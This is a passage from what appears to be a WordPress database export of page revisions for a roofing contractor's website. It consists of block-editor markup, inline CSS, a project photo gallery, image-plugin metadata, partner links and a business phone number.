class=\\u0022sui-smush-media smush-status-links\\u0022\\u003e\\u003ca href=\\u0022#\\u0022 class=\\u0022wp-smush-action smush-stats-details wp-smush-title sui-tooltip sui-tooltip-top-right\\u0022 data-tooltip=\\u0022Detailed stats for all the image sizes\\u0022\\u003eView Stats\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv id=\\u0022smush-stats-485\\u0022 class=\\u0022sui-smush-media smush-stats-wrapper hidden\\u0022\\u003e\\n\\t\\t\\t\\u003ctable class=\\u0022wp-smush-stats-holder\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cthead\\u003e\\n\\t\\t\\t\\t\\t\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eImage size\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eSavings\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\n\\t\\t\\t\\t\\u003c/thead\\u003e\\n\\t\\t\\t\\t\\u003ctbody\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFULL\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd class=\\u0022smush-skipped\\u0022\\u003e\\u003ca href=\\u0022https://wpmudev.com/project/wp-smush-pro/?utm_source=smush\\u0026utm_medium=plugin\\u0026utm_campaign=smush_medialibrary_savings\\u0022 target=\\u0022_blank\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tooltip sui-tooltip-left sui-tooltip-constrained sui-tooltip-top-right-mobile\\u0022 data-tooltip=\\u0022When you upload an image to WordPress it automatically creates 8 thumbnail sizes that are commonly used in your pages. WordPress also stores the original full-size image, but because these are not usually embedded on your site we don’t Smush them. Pro users can override this.\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tag sui-tag-purple sui-tag-sm\\u0022\\u003ePRO\\u003c/span\\u003e\\u003c/span\\u003e\\u003c/a\\u003e\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eTHUMBNAIL \\u003cbr /\\u003e (150x98)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e7.1 KB ( 57.1% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFOOTERTHUMB \\u003cbr /\\u003e (100x84)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e6.9 KB ( 68.2% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003c/tbody\\u003e\\n\\t\\t\\t\\u003c/table\\u003e\\n\\t\\t\\u003c/div\\u003e\"}},{\"cta_url\":\"https://dunriteroof.com/\",\"title\":\"Dunrite Roofing\",\"hover_description\":\"Quality and your satisfaction is our priority\",\"img_id\":362,\"img_url\":{\"id\":362,\"title\":\"favicon2\",\"filename\":\"favicon2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/favicon2.jpg\",\"link\":\"https://cteisys.com/favicon2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"favicon2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2022-08-22T17:14:26.000Z\",\"modified\":\"2022-08-22T17:14:26.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://cteisys.com/wp-includes/images/media/default.png\",\"dateFormatted\":\"August 22, 2022\",\"nonces\":{\"update\":\"64b740e15e\",\"delete\":\"e70c4e34ec\",\"edit\":\"b7e85ec790\"},\"editLink\":\"https://cteisys.com/wp-admin/post.php?post=362\\u0026action=edit\",\"meta\":false,\"authorName\":\"newd\",\"authorLink\":\"https://cteisys.com/wp-admin/profile.php\",\"filesizeInBytes\":8853,\"filesizeHumanReadable\":\"9 KB\",\"context\":\"\",\"height\":131,\"width\":171,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":131,\"width\":150,\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/favicon2-150x131.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/favicon2.jpg\",\"height\":131,\"width\":171,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"},\"smush\":\"\\u003cp class=\\u0022smush-status\\u0022\\u003eNot processed\\u003c/p\\u003e\\u003cdiv class=\\u0022sui-smush-media smush-status-links\\u0022\\u003e\\u003ca href=\'#\' class=\'wp-smush-send\' data-id=\'362\'\\u003eSmush\\u003c/a\\u003e | \\u003ca href=\'#\' class=\'smush-ignore-image\' data-id=\'362\'\\u003eIgnore\\u003c/a\\u003e\\u003c/div\\u003e\"}}],\"counterId\":\"c77eb9f9-e476-4ddb-adc9-dfd6b65343ca\"} -->\n<style type=\"text/css\"> .wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca .wp-block-skt-blocks-image-boxes-block-item__description, .wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca .wp-block-skt-blocks-image-boxes-block-item__title {\n color: undefined; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca {\n background-color: undefined; color: undefined; text-align: center; border-radius:undefinedpx; justify-content:center !important; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca:hover .skt-blocks-add-image {\n background-image: linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)); border-radius:undefinedpx; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca:hover .skt-blocks-imagebox-image-wrap.front {\n transform: scale(undefined); }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca .skt-blocks-imagebox-image-wrap.front img {\n width:fullpx !important; max-width:100%; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 976px){\n\n.wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n</style><div class=\"has-text-align-center\"><div class=\"wp-block-skt-blocks-image-boxes-block__inner has-columns has-2-columns has-responsive-columns has-medium-gutter\"><a href=\"https://www.owenscorning.com/\"><div class=\"wp-block-skt-blocks-image-boxes-block-item block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca\" style=\"background-color:rgba(255, 255, 255, 0.7);background-image:linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)),url(https://cteisys.com/wp-content/uploads/2022/08/owens-corning.jpg);padding-left:15px;padding-right:15px;padding-bottom:15px;padding-top:15px;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-add-image\"></div><h3 class=\"wp-block-skt-blocks-image-boxes-block-item__title\">Owens Corning</h3><p class=\"wp-block-skt-blocks-image-boxes-block-item__description\">At Owens Corning, we know it’s More Than Just a Roof®.</p></div></a><a href=\"https://dunriteroof.com/\"><div class=\"wp-block-skt-blocks-image-boxes-block-item block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca\" style=\"background-color:rgba(255, 255, 255, 0.7);background-image:linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)),url(https://cteisys.com/wp-content/uploads/2022/08/favicon2.jpg);padding-left:15px;padding-right:15px;padding-bottom:15px;padding-top:15px;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-add-image\"></div><h3 class=\"wp-block-skt-blocks-image-boxes-block-item__title\">Dunrite Roofing</h3><p class=\"wp-block-skt-blocks-image-boxes-block-item__description\">Quality and your satisfaction is our priority</p></div></a></div></div>\n<!-- /wp:skt-blocks/image-boxes-block -->\n\n<!-- wp:paragraph -->\n<p>Call (248) 393-5000</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Fill out our contact form&nbsp;<a href=\"https://cteisys.com/contact-layout-1/\">here.</a>&nbsp;We will get back with you soon.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Roofing','','inherit','closed','closed','','263-revision-v1','','','2022-08-25 00:06:12','2022-08-25 00:06:12','',263,'https://cteisys.com/?p=498',0,'revision','',0),(479,1,'2022-08-24 17:54:14','2022-08-24 17:54:14','<!-- wp:paragraph -->\n<p>We take pride in our work. Let us show you. Contact us today (248) 393-5000</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":450,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/25660384_1899639140050518_6277447985993158090_n.jpg\" alt=\"\" class=\"wp-image-450\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":449,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/25592097_1899639136717185_4321270429465251825_n.jpg\" alt=\"\" class=\"wp-image-449\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":448,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23844616_1868197126528053_4157812209739993838_n.jpg\" alt=\"\" class=\"wp-image-448\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":447,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23843260_1868197133194719_3148537784022538449_n.jpg\" alt=\"\" class=\"wp-image-447\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":446,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23795383_1868197219861377_192834509148892931_n.jpg\" alt=\"\" class=\"wp-image-446\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":445,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23517652_1851799148167851_4518671867384389908_n.jpg\" alt=\"\" class=\"wp-image-445\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":444,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18119545_1646581548689613_8488233903493088586_n.jpg\" alt=\"\" class=\"wp-image-444\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":442,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18118635_1641106092570492_880445919232503964_n.jpg\" alt=\"\" class=\"wp-image-442\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":412,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/280659088_5602458996435162_2458487168335242841_n.jpg\" alt=\"\" class=\"wp-image-412\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":413,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/c60adea113fb2f5f80419bb170309509.jpg\" alt=\"\" class=\"wp-image-413\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":414,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/DSC03903-1.jpg\" alt=\"\" class=\"wp-image-414\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":436,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/12038053_1138498862831220_6417864339135922840_n.jpg\" alt=\"\" class=\"wp-image-436\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":438,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/17992072_1641106229237145_7019424871005086701_n-1.jpg\" alt=\"\" class=\"wp-image-438\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":440,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18033957_1641106155903819_3439710667750671365_n.jpg\" alt=\"\" class=\"wp-image-440\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":441,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18057957_1641106209237147_2139335743547445839_n.jpg\" alt=\"\" class=\"wp-image-441\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"a9bea998-7d0c-4e4b-928d-b108fd7a7c6d\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"44ecaf20-952d-4f7f-81b7-7317b0c6079a\"} -->\n<style type=\"text/css\"> .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-44ecaf20-952d-4f7f-81b7-7317b0c6079a skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b\"} -->\n<style type=\"text/css\"> .block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"a821e40c-d9db-4df8-a874-ba207b78e2ab\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Home Repair</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"40e7f1d9-3bdc-4663-8f6e-103dd744774b\"} -->\n<style 